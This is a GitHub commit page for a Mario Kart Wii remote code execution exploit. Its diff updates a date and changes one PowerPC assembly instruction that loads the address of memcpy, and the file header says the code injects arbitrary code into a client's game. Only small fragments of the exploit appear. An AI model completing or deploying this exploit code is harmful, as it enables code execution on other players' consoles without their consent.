Skip to content

Commit

Permalink
Do not treat the address of 'memcpy' as a sign-extended value
Browse files Browse the repository at this point in the history
  • Loading branch information
MikeIsAStar committed Nov 3, 2023
1 parent 8fa00aa commit 1c81ffe
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions mario_kart_wii_remote_code_execution.S
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
# Mario Kart Wii Remote Code Execution #
#--------------------------------------#
# Author : MikeIsAStar #
# Date : 29 May 2023 #
# Date : 03 Nov 2023 #
#--------------------------------------#
# Description: This code will inject #
# arbitrary code into a client's game. #
Expand Down Expand Up @@ -59,7 +59,7 @@ payloadStart:
payloadEnd:
packetEnd:

lis 12, 0x80005F34@ha
lis 12, 0x80005F34@h
li 5, packetSize
mflr 4
ori 12, 12, 0x80005F34@l
Expand Down

0 comments on commit 1c81ffe

Please sign in to comment.